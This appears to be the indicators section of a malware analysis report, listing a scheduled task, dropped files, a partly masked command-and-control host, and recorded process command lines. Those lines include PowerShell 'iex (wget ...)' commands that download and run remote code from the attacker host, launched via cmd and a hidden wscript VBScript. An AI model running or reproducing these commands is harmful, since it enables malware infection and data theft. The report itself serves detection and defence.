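Technical Information
The list below gives file-system paths, a network endpoint with its HTTP and DNS requests, and process command lines. The `#` characters in host names, URLs and query strings appear to be masking applied in the report rather than literal characters, so these strings should not be matched verbatim. The command lines are shown as recorded, including their unbalanced quotes.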
- <SYSTEM32>\tasks\{e3acd25c-c313-4061-a87d-edaf1235dccd}
- %APPDATA%temp
- %TEMP%\e653d73e45833b6c
- %APPDATA%\microsoft\windows\templates\officeappmanifest_v6_13_295.xml
- 'mc.#zs.kr':80
- http://mc.#zs.kr/themes/mobile/images/about/temp/upload/list.php?qu#####
- http://mc.#zs.kr/themes/mobile/images/about/temp/attach/attach.docx
- DNS ASK mc.#zs.kr
- '<SYSTEM32>\wscript.exe' /e:vbscript /b %APPDATA%temp
- '<SYSTEM32>\cmd.exe' /c powershell -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';